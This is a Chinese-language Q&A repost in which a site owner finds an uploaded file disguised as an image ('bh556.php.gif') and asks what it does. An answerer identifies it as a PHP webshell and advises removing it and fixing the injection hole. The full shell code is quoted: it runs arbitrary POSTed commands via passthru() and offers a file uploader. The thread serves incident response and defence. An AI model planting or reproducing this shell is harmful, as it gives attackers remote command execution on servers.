首页 / PHP / php – 可能的网站黑客尝试
php – 可能的网站黑客尝试
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了php – 可能的网站黑客尝试,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1309字,纯文字阅读大概需要2分钟。
内容图文
![php – 可能的网站黑客尝试](/upload/InfoBanner/zyjiaocheng/725/4e72a99829d943b0ad01a964531c8371.jpg)
我刚从主人那里得到一个温暖的消息告诉我..
“我们检测到通过http或ftp访问您帐户的恶意企图”
检查过恶意文件后,有人上传了一个名为“bh556.php.gif”的图标
打开此文件,它包含以下代码:
<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
<div align="left"><font size="1">Uploader file :</font></div>
<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
$pwddir = $_POST['dir'];
$real = $_FILES['file']['name'];
$dez = $pwddir."/".$real;
copy($uploaded, $dez);
echo "FILE UPLOADED TO $dez";
}
?> </pre>
<form name="form1" method="post" enctype="multipart/form-data">
<input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
<input type="submit" name="submit2" value="Upload">
<input type="file" name="file" size="15">
</td>
</tr>
</table>
</body>
</html>
有人可以解释如何防止再次通过图标上传,还请解释上面的代码究竟是做什么的?
解决方法:
它是一个PHP Webshel??l,请参阅here以获取常见的列表.它允许恶意用户通过PHP文件执行命令,这是非常妥协的.
通过标题和一些聪明的技巧将它们隐藏在图像中很常见,请参阅说明here
我的建议,删除文件,解决泄漏的原因,这可能是一些描述的注入攻击.
内容总结
以上是互联网集市为您收集整理的php – 可能的网站黑客尝试全部内容,希望文章能够帮你解决php – 可能的网站黑客尝试所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。